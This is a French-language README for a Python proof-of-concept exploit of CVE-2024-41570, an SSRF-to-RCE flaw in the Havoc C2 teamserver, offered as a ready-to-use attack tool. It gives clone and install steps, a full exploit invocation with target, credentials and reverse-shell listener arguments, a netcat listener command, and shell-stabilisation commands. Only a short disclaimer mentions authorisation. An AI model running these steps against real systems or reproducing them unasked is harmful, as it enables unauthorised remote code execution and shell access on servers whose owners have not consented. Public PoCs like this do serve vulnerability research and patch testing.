
Exploit automatisé de reverse shell via WebSocket | Havoc-C2-SSRF avec RCE
Ce projet fournit un script de preuve de concept (PoC) en Python pour exploiter un service WebSocket vulnérable. Le script automatise l'enregistrement d'un agent, la livraison de la charge utile WebSocket et l'exécution de commandes à distance pour établir un reverse shell.
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
Exécutez le script avec les arguments requis :
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t : URL cible du serveur WebSocket.-i : Adresse IP du Team Server de Havoc.-p : Port du Team Server de Havoc.-U : Nom d'utilisateur pour l'authentification WebSocket.-P : Mot de passe pour l'authentification WebSocket.-l : IP du listener pour le reverse shell (votre machine).-L : Port du listener pour le reverse shell (votre machine).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
Le script nécessite les bibliothèques Python suivantes :
requestspycryptodomeInstallez-les en utilisant la commande :
pip install -r requirements.txt
Ce script est destiné uniquement à des fins éducatives. Assurez-vous d'avoir une autorisation explicite pour tester le système cible. Une mauvaise utilisation de ce script peut violer les lois et les directives éthiques.
Inspiré par Default Havoc Poc
Les contributions sont les bienvenues ! N'hésitez pas à forker le dépôt et à soumettre une pull request.
Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.